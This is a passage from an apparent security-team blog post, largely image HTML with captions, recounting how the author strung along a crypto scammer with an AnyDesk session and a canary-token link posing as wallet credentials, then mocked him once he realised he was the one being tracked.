srcset="https://substackcdn.com/image/fetch/$s_!xtRN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf8dcb4d-a03b-4e52-8e07-22b94b0df990_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!xtRN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf8dcb4d-a03b-4e52-8e07-22b94b0df990_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!xtRN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf8dcb4d-a03b-4e52-8e07-22b94b0df990_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!xtRN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf8dcb4d-a03b-4e52-8e07-22b94b0df990_750x1334.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!xtRN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf8dcb4d-a03b-4e52-8e07-22b94b0df990_750x1334.png" width="352" height="626.0906666666667" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bf8dcb4d-a03b-4e52-8e07-22b94b0df990_750x1334.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/271a7b37-83d1-4e57-9f38-14ee9591738d_750x1334.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1334,&quot;width&quot;:750,&quot;resizeWidth&quot;:352,&quot;bytes&quot;:783343,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F271a7b37-83d1-4e57-9f38-14ee9591738d_750x1334.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!xtRN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf8dcb4d-a03b-4e52-8e07-22b94b0df990_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!xtRN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf8dcb4d-a03b-4e52-8e07-22b94b0df990_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!xtRN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf8dcb4d-a03b-4e52-8e07-22b94b0df990_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!xtRN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf8dcb4d-a03b-4e52-8e07-22b94b0df990_750x1334.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;I&#8217;m checking with our security advisor. He said installing AnyDesk on a government computer could be highly compromising and problematic for us. Is there another solution?&#8221;</figcaption></figure></div><p>Some suspicions arise. He&#8217;s afraid of installing <strong>AnyDesk</strong>. </p><p>And that&#8217;s where we have to draw a line, an interesting one.</p><p><strong>DPRK</strong> agents use <strong>AnyDesk</strong> daily to <a href="https://quetzal.bitso.com/p/interview-with-the-chollima-v">work for remote companies under fake or stolen identities</a>. They don&#8217;t care.</p><p><strong>Chinese</strong> <strong>APTs</strong> literally set up legal companies just to <a href="https://quetzal.bitso.com/p/stealing-christmas">issue valid code-signing certificates</a>, so their malware runs as <strong>trusted software</strong>.</p><p>And you&#8217;re scared of installing <strong>AnyDesk</strong>&#8230; for the chance to win <strong>1300 BTC</strong>?</p><p>But this is my case, <strong>I&#8217;m the negotiator here</strong>, so I convince him to keep going.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!GdIL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe641874a-d3ea-46f1-9641-20819f50c353_740x1330.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!GdIL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe641874a-d3ea-46f1-9641-20819f50c353_740x1330.png 424w, https://substackcdn.com/image/fetch/$s_!GdIL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe641874a-d3ea-46f1-9641-20819f50c353_740x1330.png 848w, https://substackcdn.com/image/fetch/$s_!GdIL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe641874a-d3ea-46f1-9641-20819f50c353_740x1330.png 1272w, https://substackcdn.com/image/fetch/$s_!GdIL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe641874a-d3ea-46f1-9641-20819f50c353_740x1330.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!GdIL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe641874a-d3ea-46f1-9641-20819f50c353_740x1330.png" width="344" height="618.2702702702703" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e641874a-d3ea-46f1-9641-20819f50c353_740x1330.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/02a4817a-e531-4d67-b533-ae869ccd7a91_740x1330.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1330,&quot;width&quot;:740,&quot;resizeWidth&quot;:344,&quot;bytes&quot;:582219,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F02a4817a-e531-4d67-b533-ae869ccd7a91_740x1330.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!GdIL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe641874a-d3ea-46f1-9641-20819f50c353_740x1330.png 424w, https://substackcdn.com/image/fetch/$s_!GdIL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe641874a-d3ea-46f1-9641-20819f50c353_740x1330.png 848w, https://substackcdn.com/image/fetch/$s_!GdIL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe641874a-d3ea-46f1-9641-20819f50c353_740x1330.png 1272w, https://substackcdn.com/image/fetch/$s_!GdIL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe641874a-d3ea-46f1-9641-20819f50c353_740x1330.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;You should see a Chrome or Firefox browser with the Bitso login screen. I&#8217;m sending the credentials here [REDACTED].com/bitso-ID-107A-MFA-xayt-8290&#8221;</figcaption></figure></div><p>We shared the <strong>AnyDesk</strong> access code and a link to the &#8220;<em>wallet</em> <em>credentials</em>&#8221;.</p><p>Of course, if you&#8217;ve been following our posts, you already know what that link really is: <strong>a <a href="https://canarytokens.org/nest/">canary token</a></strong>. Once triggered, it reveals <strong>everything about the visitor</strong>: location, IP address, browser fingerprint and more.</p><p>And if your eyes are sharp enough, you might have noticed that the leetspeak in the URL spells out a not-so-friendly (but deserved) nickname for our guest. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0Lqq!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F146d6d2f-bb52-414b-a74d-42f97fe22840_750x1334.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0Lqq!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F146d6d2f-bb52-414b-a74d-42f97fe22840_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!0Lqq!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F146d6d2f-bb52-414b-a74d-42f97fe22840_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!0Lqq!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F146d6d2f-bb52-414b-a74d-42f97fe22840_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!0Lqq!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F146d6d2f-bb52-414b-a74d-42f97fe22840_750x1334.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0Lqq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F146d6d2f-bb52-414b-a74d-42f97fe22840_750x1334.png" width="344" height="611.8613333333333" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/146d6d2f-bb52-414b-a74d-42f97fe22840_750x1334.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e2ebd532-e552-4d31-bcab-cf03f1bd2440_750x1334.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1334,&quot;width&quot;:750,&quot;resizeWidth&quot;:344,&quot;bytes&quot;:728260,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe2ebd532-e552-4d31-bcab-cf03f1bd2440_750x1334.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!0Lqq!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F146d6d2f-bb52-414b-a74d-42f97fe22840_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!0Lqq!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F146d6d2f-bb52-414b-a74d-42f97fe22840_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!0Lqq!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F146d6d2f-bb52-414b-a74d-42f97fe22840_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!0Lqq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F146d6d2f-bb52-414b-a74d-42f97fe22840_750x1334.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;The link you sent doesn&#8217;t redirect to any access code. It takes me to the blog section of your site. If not, send it to me via Signal, it&#8217;s more secure&#8221;.</figcaption></figure></div><p>The <em>threat stuntman</em> complains that the <strong>canary token</strong> link sends him into a never-ending redirect loop.</p><p>I calmly explain that it&#8217;s likely because he&#8217;s using a <strong><a href="https://en.wikipedia.org/wiki/Blacklist_(computing)">blacklisted IP</a></strong> (probably from a <a href="https://en.wikipedia.org/wiki/Virtual_private_server">VPS</a> or a VPN) which triggers the system to <strong>bounce the request</strong>.</p><p>He then spends <strong>a lot of time</strong> (and I do mean a lot) switching between different <strong>VPS</strong> and <strong>VPN</strong> services, desperately <strong>trying to bypass the control</strong>.</p><p>You can trip over the same stone twice.</p><p><em>But ten times?</em></p><p>That definitely sets a new record.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!RG5c!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd58bea-a2d2-40fa-9495-e178d7272ab7_838x92.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!RG5c!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd58bea-a2d2-40fa-9495-e178d7272ab7_838x92.png 424w, https://substackcdn.com/image/fetch/$s_!RG5c!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd58bea-a2d2-40fa-9495-e178d7272ab7_838x92.png 848w, https://substackcdn.com/image/fetch/$s_!RG5c!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd58bea-a2d2-40fa-9495-e178d7272ab7_838x92.png 1272w, https://substackcdn.com/image/fetch/$s_!RG5c!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd58bea-a2d2-40fa-9495-e178d7272ab7_838x92.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!RG5c!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd58bea-a2d2-40fa-9495-e178d7272ab7_838x92.png" width="620" height="68.06682577565633" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3fd58bea-a2d2-40fa-9495-e178d7272ab7_838x92.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:92,&quot;width&quot;:838,&quot;resizeWidth&quot;:620,&quot;bytes&quot;:19164,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd58bea-a2d2-40fa-9495-e178d7272ab7_838x92.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!RG5c!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd58bea-a2d2-40fa-9495-e178d7272ab7_838x92.png 424w, https://substackcdn.com/image/fetch/$s_!RG5c!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd58bea-a2d2-40fa-9495-e178d7272ab7_838x92.png 848w, https://substackcdn.com/image/fetch/$s_!RG5c!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd58bea-a2d2-40fa-9495-e178d7272ab7_838x92.png 1272w, https://substackcdn.com/image/fetch/$s_!RG5c!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd58bea-a2d2-40fa-9495-e178d7272ab7_838x92.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">A record for the Darwin Awards.</figcaption></figure></div><p>Finally, when laughter turns into pity and second-hand embarrassment, he starts to realise what&#8217;s going on: <strong>He&#8217;s the one being hunted</strong>.</p><p>There are no <strong>1300 BTC</strong>. There <strong>never</strong> were.</p><p>No <strong>100 million dollars</strong> to claim. Not even close.</p><p><strong>It was all for nothing.</strong></p><p>He tries to confront me, but I had already prepared a handcrafted gift just for him.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8eN1!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc90bf65d-1759-4042-980b-9cdb41bc0e3a_750x1334.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8eN1!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc90bf65d-1759-4042-980b-9cdb41bc0e3a_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!8eN1!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc90bf65d-1759-4042-980b-9cdb41bc0e3a_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!8eN1!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc90bf65d-1759-4042-980b-9cdb41bc0e3a_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!8eN1!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc90bf65d-1759-4042-980b-9cdb41bc0e3a_750x1334.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8eN1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc90bf65d-1759-4042-980b-9cdb41bc0e3a_750x1334.png" width="326" height="579.8453333333333" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c90bf65d-1759-4042-980b-9cdb41bc0e3a_750x1334.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/eaaf2160-727a-4b2c-b8ce-fd05942e69b2_750x1334.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1334,&quot;width&quot;:750,&quot;resizeWidth&quot;:326,&quot;bytes&quot;:1449297,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feaaf2160-727a-4b2c-b8ce-fd05942e69b2_750x1334.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!8eN1!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc90bf65d-1759-4042-980b-9cdb41bc0e3a_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!8eN1!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc90bf65d-1759-4042-980b-9cdb41bc0e3a_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!8eN1!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc90bf65d-1759-4042-980b-9cdb41bc0e3a_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!8eN1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc90bf65d-1759-4042-980b-9cdb41bc0e3a_750x1334.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;The security service&#8217;s technician just told me that the link you sent is a Canary Token, not a password link&#8221;.</figcaption></figure></div><p><strong>Saint Valentine&#8217;s spirit is in the air, honey.</strong></p><p>Of course there are no credentials, you nerd!</p><p>Go <strong>touch some grass</strong>, love someone, spread pheromones. You unloved, uncared, unmoisturized threat stuntman.</p><p>And if you were counting on this money to gift your significant other something cute&#8230; I&#8217;m sorry to spoil it, bunny.</p><p><strong>But you can have this handcrafted letter for free:</strong></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!h8bZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2c879cc-bc14-4a26-be5f-f036ff11e6ef_4032x3024.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!h8bZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2c879cc-bc14-4a26-be5f-f036ff11e6ef_4032x3024.jpeg 424w, https://substackcdn.com/image/fetch/$s_!h8bZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2c879cc-bc14-4a26-be5f-f036ff11e6ef_4032x3024.jpeg 848w, 